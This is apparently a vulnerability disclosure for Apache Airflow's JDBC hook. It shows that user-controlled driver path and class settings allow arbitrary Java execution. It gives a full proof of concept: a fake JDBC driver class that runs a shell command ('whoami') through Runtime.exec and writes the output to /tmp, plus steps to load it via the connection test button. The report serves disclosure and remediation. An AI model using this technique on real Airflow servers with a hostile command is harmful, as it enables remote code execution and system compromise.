In airflow.providers.jdbc.hooks.jdbc.JdbcHook, A privilege escalation vulnerability exists in a system due to controllable Driver Path
and Driver Class
parameters which cause executing any java code.
Vulnerability reproduction steps:
import java.io.*;
import java.sql.*;
import java.util.Properties;
import java.util.logging.Logger;
public class Test implements Driver {
static {
try {
cmd();
DriverManager.registerDriver(new Test());
} catch (Exception e) {
e.printStackTrace();
}
}
@Override
public Connection connect(String url, Properties info) throws SQLException {
return null;
}
@Override
public boolean acceptsURL(String url) throws SQLException {
try {
cmd();
} catch (IOException e) {
throw new RuntimeException(e);
}
// 验证URL是否为该驱动程序所支持的URL
return url.startsWith("jdbc:mydb:");
}
@Override
public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
return new DriverPropertyInfo[0];
}
@Override
public int getMajorVersion() {
return 1;
}
@Override
public int getMinorVersion() {
return 0;
}
@Override
public boolean jdbcCompliant() {
return false;
}
@Override
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
public static void cmd() throws IOException {
String[] cmd = {"sh", "-c", "whoami"};
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(in));
File outputFile = new File("/tmp/airflow-jdbc.txt");
BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));
String line;
while ((line = reader.readLine()) != null) {
writer.write(line);
writer.newLine();
}
writer.close();
}
}
generate a jar package.
config jdbc connection
Go to the Connection configuration page.
Fill in the driver path
with the path of jar package generated in the previous step.
Fill in the driver class
with the value of Test.
click on the test button
Click on the test button and it can be observed that the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.
This is a screenshot of my email exchange with Airflow developers:
███